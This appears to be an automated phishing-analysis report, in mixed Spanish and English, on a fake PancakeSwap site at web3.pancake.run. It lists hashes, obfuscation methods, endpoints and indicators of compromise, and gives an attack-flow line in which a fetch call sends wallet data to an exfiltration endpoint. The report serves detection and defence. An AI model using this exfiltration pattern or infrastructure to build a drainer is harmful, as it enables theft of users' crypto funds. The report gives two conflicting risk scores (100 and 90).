Phishing Analysis
Detailed analysis of captured phishing page
Captura Visual
Información de Detección
https://web3.pancake.run/burn-dashboard
Detected Brand
PancakeSwap
Country
International
Confianza
100%
HTTP Status
200
Report ID
6ce2a60d-b21…
Analyzed
2026-02-04 23:57
Hashes de Contenido (Similitud HTML)
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T1664472F1F20869DBF1421FDAC652B6E23066B079EF564784F77097A91D0FC82A852F06 |
|
CONTENT
ssdeep
|
1536:e/XfbX0K1lQLfUUP5l85l5aDFCfKSzvh/xClQLfUUQlQLfUUzJ4CFf5lvckyFm+K:M1IHM5aaNxCIQIpF3OQ |
Hashes Visuales (Similitud de Captura)
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
b84f5bc75610c716 |
|
VISUAL
aHash
|
1889d7c3d7ff8fcf |
|
VISUAL
dHash
|
b13bacb62c44b8ba |
|
VISUAL
wHash
|
3c81534386be8ec2 |
|
VISUAL
colorHash
|
070002000c8 |
|
VISUAL
cropResistant
|
b13bacb62c44b8ba |
Análisis de Código
Risk Score
100/100
Nivel de Amenaza
ALTO
⚠️ Phishing Confirmed
🎣 Credential Harvester
🎣 OTP Stealer
🎣 Card Stealer
🎣 Banking
🎣 Personal Info
WebSocket C2
🔥 Firebase Backend
🔬 Threat Analysis Report
• Amenaza: Phishing
• Objetivo: Usuarios de PancakeSwap
• Método: Suplantación de identidad y robo de datos
• Exfil: Desconocido (potencialmente a través de endpoints de Firebase o WebSocket)
• Indicadores: Desajuste de dominio, ofuscación, envío de formulario JS.
• Riesgo: ALTO
🔒 Obfuscation Detected
- atob
- fromCharCode
- unescape
- hex_escape
- unicode_escape
- base64_strings
🎯 Kit Endpoints
- https://web3.pancake.run/api/exfiltrate
- https://blog.pancakeswap.finance/
- https://blog.pancakeswap.finance
- solana_signAndSendTransaction
- solana:signAndSendTransaction
📡 API Calls Detected
- 0x3b3b57de
- https://aptos.pancakeswap.finance
- /api/paymaster
- https://solana.pancakeswap.finance
- https://proofs.pancakeswap.com/cms-config/routing-base-config.json
- POST
- /api/auth/telegram-callback
- stats
- https://api.blocto.app/networks/evm
- https://www.google.com/ccm/geo
- https://raw-api.pancakeswap.com/ondo/market-status
- logs
- account
- https://burn-stats.pancakeswap.com/data.json
- https://raw-api.pancakeswap.com/ondo/status
- GET
- https://api-v3.raydium.io/main/auto-fee
- /__cookies__
- https://raw.githubusercontent.com/pancakeswap/airdrop-v3-users/master/forFE.json
- proxy
☁️ Cloud Backend
- Firebase: pancakeswap-prod-firebase.firebaseapp.com
📊 Desglose de Puntuación de Riesgo
Total Risk Score
90/100
Contributing Factors
Domain Mismatch
The domain 'web3.pancake.run' does not match the official PancakeSwap domain.
Obfuscated Javascript
Obfuscation of javascript code is a common technique to hide malicious code.
Active Phishing Kit
Presence of Firebase endpoints and WebSocket URLs indicate active exfiltration attempt.
🔬 Análisis Integral de Amenazas
Tipo de Amenaza
Banking Credential Harvester
Objetivo
PancakeSwap users (International)
Método de Ataque
Brand impersonation + real-time WebSocket exfiltration + obfuscated JavaScript
Canal de Exfiltración
Firebase Database + WebSocket (174 endpoints)
Evaluación de Riesgo
CRITICAL - Automated credential harvesting with Firebase Database + WebSocket (174 endpoints)
⚠️ Indicators of Compromise
- Kit types: Credential Harvester, OTP Stealer, Card Stealer, Banking, Personal Info
- Kit signatures: angler
- 1152 obfuscation techniques
🏢 Análisis de Suplantación de Marca
Impersonated Brand
PancakeSwap
Official Website
https://pancakeswap.finance/
Fake Service
PancakeSwap Dashboard
⚔️ Metodología de Ataque
Primary Method: Credential Harvesting / Crypto Theft
The site is attempting to steal user's credentials or wallet information, potentially through malicious JavaScript code and Firebase/WebSocket communication. The user's funds could be stolen or they could be redirected to a compromised site.
Secondary Method: Malicious Code Injection
The site likely has malicious JavaScript code that could be used to redirect the user to a fake login form or steal their wallet details.
Target Blockchain
Binance Smart Chain
🌐 Indicadores de Compromiso de Infraestructura
🦠 Malicious Files
Main File
main-d2ed6ccdef2c9f19.js
File Size
📊 Diagrama de Flujo de Ataque
User fills <input name='wallet'> → sendData() → fetch('https://web3.pancake.run/api/exfiltrate') → credentials sent
🔬 JavaScript Deep Analysis
Operator Language
English (1%)
Total Code Size
836,5 KB
🔗 API Endpoints Detected
Other
11
🔐 Obfuscation Detected
- : Moderate
- : Light
- : Heavy
- : Moderate
- : Moderate
- : Light
- : Light
- : Light
- : Light
- : None
🤖 AI-Extracted Threat Intelligence
📊 Attack Flow
User fills <input name='wallet'> → sendData() → fetch('https://web3.pancake.run/api/exfiltrate') → credentials sent
🎯 Malicious Files Identified
Main Drainer
main-d2ed6ccdef2c9f19.jsFile Size
45KB
Malicious Functions
sendData()
Similar Websites
Pages with identical visual appearance (based on perceptual hash)
Scan History for web3.pancake.run
Found 10 other scans for this domain
-
https://www.web3.pancake.run
https://web3.pancake.run/info/v3/pairs/0x24618d12b...
https://web3.pancake.run/
https://www.web3.pancake.run/info/v3/tokens/0x0e09...
https://www.web3.pancake.run/info/v3/tokens/0x7130...
http://www.web3.pancake.run/info/infinity
https://web3.pancake.run/info/infinity
http://www.web3.pancake.run/swap
https://www.web3.pancake.run/info/v3/pairs/0xd317b...
https://www.web3.pancake.run/info/v3/pairs
"Nunca pensé que me pasaría a mí"
Esto dicen las 2.3 millones de víctimas cada año. No esperes a ser una estadística.